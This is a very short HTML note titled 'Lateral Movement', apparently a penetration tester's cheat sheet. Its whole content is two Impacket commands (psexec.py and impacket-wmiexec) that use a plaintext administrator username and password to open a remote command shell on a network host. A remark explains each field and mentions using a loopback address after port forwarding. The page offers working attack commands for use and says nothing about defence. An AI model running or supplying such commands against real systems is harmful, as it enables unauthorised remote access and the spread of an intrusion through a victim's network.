<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Lateral Movement</title>
</head><body>psexec.py 'administrator:Welcome1!@192.168.0.16' cmd &nbsp; &lt;-----administrator is the user - Welcome1! is the password - 192.168.0.16 is the remote IP, keep in mind, if you portfwd, you can use loopback address as the IP<br/>
<br/>
impacket-wmiexec 'administrator:Welcome1!@127.0.0.1' cmd<br/>
</body></html>